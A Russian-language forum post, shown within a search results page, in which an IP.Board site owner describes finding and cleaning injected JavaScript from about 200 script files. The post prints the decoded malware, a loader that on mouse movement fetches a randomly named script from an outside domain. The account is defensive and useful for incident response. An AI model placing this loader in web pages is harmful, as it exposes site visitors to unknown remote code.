Перейти к содержанию

Поиск сообщества

Показаны результаты для тегов 'вирус'.

  • Поиск по тегам

    Введите теги через запятую.
  • Поиск по автору

Тип контента


Форумы

  • IPBmafia.ru
    • Правила, инструкции, справки
    • Мероприятия / Конкурсы
    • Новости IPS
    • Книга жалоб и предложений
  • Файловый архив
    • Релизы IPS 4
    • Коммерция
    • Антиспам и безопасность
    • Темы и дизайн
    • Интерфейс
    • Модерация
    • Администрирование
    • Локализация и переводы
    • Файлы для Invision Power Board 3.x
  • IPS Community Suite
    • Техническая поддержка IPS Community Suite 4
    • Темы и дизайн IPS Community Suite 4
    • Форум запросов IPS Community Suite 4
    • Invision Power Board 3.x
  • Web-Мастерская
    • Freelance
    • Биржа Веб-мастера
    • Хостинг. Обзоры и решения
    • Программные продукты
  • Web Разработка
    • Поисковая оптимизация
    • Web-дизайн
    • HTML, CSS, XML
    • Web-программирование
    • Apache, Nginx, MySQL, ISP Manager и т.д.
  • Форумы общения
    • Флейм
    • Поздравления
    • Корзина

Категории

  • Начало работы
  • Администрирование
    • Загрузки
    • Календарь
    • Система
    • Форумы
    • Блоги
    • Галерея
    • Магазин
    • Пользователи
  • Модерирование
  • Расширение возможностей
    • Локализация
    • Темы и дизайн
    • Разработка
    • Редактор сообщений
  • База знаний

Категории

  • База знаний
    • Предыдущие версии IPB
    • Ошибки
  • Модификация
    • Модификация стилей
    • Расширение возможностей
  • Документация
    • Форум [IP.Board]
    • Блоги [IP.Blog]
    • Галерея [IP.Gallery]
    • Загрузки [IP.Downloads]
    • Страницы [IP.Content]
    • Магазин [IP.Nexus]
  • Разработка

Календари

  • Community Calendar

Найдено: 1 результат

  1. Вирус на форуме IP.Board

    Итак, недавно наш форум столкнулся с фреймом, который антивирусы посчитали за вирусную ссылку. Так как это мой первый опыт с вирусом на сайте/форуме, то я его обнаружил не так быстро, как мне хотелось.. Поделюс опытом удаления 'плохого' скрипта с форума. Как работал фрейм? Очень просто, при загрузке страницы, подгружающей заражённый яваскрипт, он активировался при малейшем движении курсором мышки и подгружал яваскрипт с какого-то постороннего сайта, в моём случае это был ___constructivehell.is-a-cubicle-slave.com/g/1351559130384.js, что делает этот срипт - не известно. Названиние подгружаемого скрипта генерировалось автоматически. Первое, что пришло мне на ум - сделать резервную копию форума и слить её на компьютер, а там уже разными прогами искать вирус по тексту в файлах.... Что я и сделал. Скачав копию форума, я начал искать название ссылки, которую блокировал антивирус, во всей копии с помощью программы Folder Find Text, но все мои попытки были напрасными.. Ссылка не находилась. Тогда я обратился хостеру, который подсказал мне где может находиться вирус и как его обнаружить (золотой же человек мой хостер ) То, что вирусный код содержится в яваскриптах, он сказал однозначно и уверенно. Как же мне найти этот код? Было предложено отсортировать файлы по дате изменения и уже смотреть их.. Но я пошёл другим путём, поискал в интрнете подобный случай и обнаружил, что это код кодируется в скриптах. Там же я обнаружил как именно он кодируется, и, по небольшому кусочку кода, начал поиск по резервной копии.. Результаты поиска меня просто шокировали: около 200 яваскриптов было заражено этим кодом. Вот как он выглядит в зашифрованном виде: А вот как в расшифрованном виде: (function() { var url = '__constructivehell.is-a-cubicle-slave.com/g/'; if (typeof window.xyzflag === 'undefined') { window.xyzflag = 0; } document.onmousemove = function() { if (window.xyzflag === 0) { window.xyzflag = 1; var head = document.getElementsByTagName('head')[0]; var script = document.createElement('script'); script.type = 'text/javascript'; script.onreadystatechange = function() { if (this.readyState == 'complete') { window.xyzflag = 2; } }; script.onload = function() { window.xyzflag = 2; }; script.src = url + Math.random().toString().substring(3) + '.js'; head.appendChild(script); } }; })(); [/code] [/spoiler] Пришлось очищать каждый скрипт от этого кода. У меня сразу же возникло пару вопросов: Как он мог проникнуть в скрипты на сервере? Кто его туда записал? По моему [u]не профессиональному[/u] мнению, я могу лишь предположить, что у меня просто угнали данные для доступа к FTP, что можно проверить по логам, было ли там копирование, а затем замена практически всех яваскриптов на форуме...
×